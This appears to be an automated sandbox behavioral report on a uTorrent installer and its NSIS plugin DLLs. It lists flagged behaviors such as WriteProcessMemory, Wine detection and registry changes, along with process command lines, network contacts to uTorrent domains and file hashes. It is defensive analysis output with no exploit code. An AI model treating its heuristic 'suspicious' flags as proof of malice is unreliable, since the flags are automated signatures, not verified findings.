Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3376 wrote to memory of 4360 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3376 wrote to memory of 4360 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3376 wrote to memory of 4360 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\bt_datachannel.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\bt_datachannel.dll,#1
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-15 03:46
Reported
2024-11-15 03:49
Platform
win11-20241007-en
Max time kernel
92s
Max time network
95s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3540 wrote to memory of 4380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3540 wrote to memory of 4380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3540 wrote to memory of 4380 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4380 -ip 4380
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 544
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-15 03:46
Reported
2024-11-15 03:49
Platform
win11-20241007-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2160 wrote to memory of 4720 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2160 wrote to memory of 4720 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2160 wrote to memory of 4720 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsisFirewall.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsisFirewall.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4720 -ip 4720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 468
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-15 03:46
Reported
2024-11-15 03:49
Platform
win11-20241007-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Software\WOW6432Node\Wine | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks installed software on the system
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-key | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin\Extension = ".btskin" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\Content Type\ = "application/x-bittorrent" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\Content Type = "application/x-bittorrent-appinst" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-key\Extension = ".btkey" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\ = "open" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-skin | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btinstall\ = "uTorrent" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-key\Extension = ".btkey" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch\OpenWithProgids | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\open | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\Content Type | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin\Content Type = "application/x-bittorrent-skin" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-appinst | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btkey\Content Type = "application/x-bittorrent-key" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\uTorrent.exe\" \"%1\" /SHELLASSOC" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\FalconBetaAccount | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp\ = "uTorrent" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-app | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\open\command | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btskin\ = "uTorrent" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-skin | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe\shell\open\command | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Roaming\\uTorrent\\maindoc.ico" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btapp\Content Type = "application/x-bittorrent-app" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-appinst\Extension = ".btinstall" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btsearch\OpenWithProgids\uTorrent | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Applications\uTorrent.exe | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-app\Extension = ".btapp" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-skin\Extension = ".btskin" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database\Content Type\application/x-bittorrent-app | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\uTorrent\shell\ = "open" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btkey | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\.btkey\ = "uTorrent" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\FalconBetaAccount\remote_access_client_id = "1112994294" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\application/x-bittorrent-app\Extension = ".btapp" | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1580 wrote to memory of 1240 | N/A | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe |
| PID 1580 wrote to memory of 1240 | N/A | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe |
| PID 1580 wrote to memory of 1240 | N/A | C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe | C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe
"C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\utorrent.exe"
C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe
uTorrent.exe /NOINSTALL /BRINGTOFRONT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | router.utorrent.com | udp |
| US | 8.8.8.8:53 | i-21.b-47142.ut.bench.utorrent.com | udp |
| US | 67.215.246.203:80 | update.utorrent.com | tcp |
| US | 44.196.243.250:80 | i-21.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:80 | i-21.b-47142.ut.bench.utorrent.com | tcp |
| US | 44.196.243.250:80 | i-21.b-47142.ut.bench.utorrent.com | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
| IS | 82.221.103.245:80 | update.utorrent.li | tcp |
Files
memory/1580-0-0x0000000000400000-0x00000000009C3000-memory.dmp
C:\Users\Admin\AppData\Roaming\uTorrent\settings.dat.old
| MD5 | 49b10fd80e6c83f0493121190c2ae7c1 |
| SHA1 | 1db23123a5cba70235c672ecd3bf7c9459f362df |
| SHA256 | 50b49e707baf0e2a3e698d9f93b7d8cb56d2272cd7637ed0f43ed6535e850ded |
| SHA512 | 943f90b6eff55fb79871f6c40e1f04a89c2da3499a1aaaeeeaa2f6d4fa755d1bfd67fcf0fe8a40c23c0d224b2013804d8493a0dc96f7ff9bce4a4932ac9e35e9 |
C:\Users\Admin\AppData\Roaming\uTorrent\toolbar.benc.new
| MD5 | 566aef8c48d777a66d350e47969d18f7 |
| SHA1 | e78a32a061df81964d5d69b5fe088e5b57b65dec |
| SHA256 | fd7b41a345db2d429d2479c290f478ae24d63fbdcbd79cc5c86b622e2108d259 |
| SHA512 | 413039035b5e570dbbe157a761ed4d3054c0f8e2fe1dda2d463cb4bf0ed588a27492e8ff04f5a8d327f39038c1c841c17d17844715e797037880f52e505c6d2d |
memory/1580-25-0x0000000000400000-0x00000000009C3000-memory.dmp
memory/1580-26-0x0000000000400000-0x00000000009C3000-memory.dmp
memory/1580-27-0x0000000000400000-0x00000000009C3000-memory.dmp
memory/1580-28-0x0000000000400000-0x00000000009C3000-memory.dmp
C:\Users\Admin\AppData\Roaming\uTorrent\settings.dat.old
| MD5 | 2532be093fef3e466023e7821b5c94b4 |
| SHA1 | 97568b8135a92c0fa50d42dceb458225a873bc03 |
| SHA256 | e3e0f1bef8d5e3a77d0f221186b658d470e2bee782f67109c90671568eb5aa3d |
| SHA512 | 0402fffdee809467019a2ad8533dddfd241f02d332509b5efb936aee79fbc155c322e7263eaa268d76897b7906f0489d884861ef49b3ecda4a90a2cb984701c1 |
C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe
| MD5 | b7f8a3909ad963d5b5260dacfa897e6e |
| SHA1 | 030ed1e99cb6d681dadca6068caf194bf67580e9 |
| SHA256 | 8837428a93c7ee46b9772d6c857e109e9baa0f5b28450f87fff7c0e8b87cf017 |
| SHA512 | 42569e974ef38ddea3300c6d82fd5e371c3cff8bdb04311c6bf3d94727fc37c5ef223ad07198ca2e499528a1671593ea6ef2bf3000611dbda49ca0a0c59c6bb4 |
memory/1580-44-0x0000000000400000-0x00000000009C3000-memory.dmp
memory/1240-45-0x0000000000400000-0x00000000009C3000-memory.dmp